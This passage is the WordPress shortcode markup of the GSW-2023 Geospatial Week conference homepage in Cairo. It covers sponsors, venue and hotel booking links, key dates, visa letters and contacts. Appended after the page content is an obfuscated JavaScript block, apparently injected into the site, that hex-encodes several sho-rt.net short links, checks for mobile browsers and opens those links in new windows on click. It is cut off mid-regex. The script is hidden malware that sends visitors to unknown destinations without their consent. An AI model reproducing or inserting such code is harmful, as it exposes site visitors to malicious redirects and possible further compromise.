center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687553155258{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 